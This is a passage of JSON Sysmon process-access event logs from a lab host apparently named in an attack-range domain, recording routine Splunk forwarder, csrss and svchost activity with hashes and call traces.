AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4161,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2077-5F25-0000-0010542F0600}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2077-5F25-0000-0010542F0600}","TargetProcessId":"3296","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4162,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2077-5F25-0000-0010542F0600}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2077-5F25-0000-0010542F0600}","TargetProcessId":"3296","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4163,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4164,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4165,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4166,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4167,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4168,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
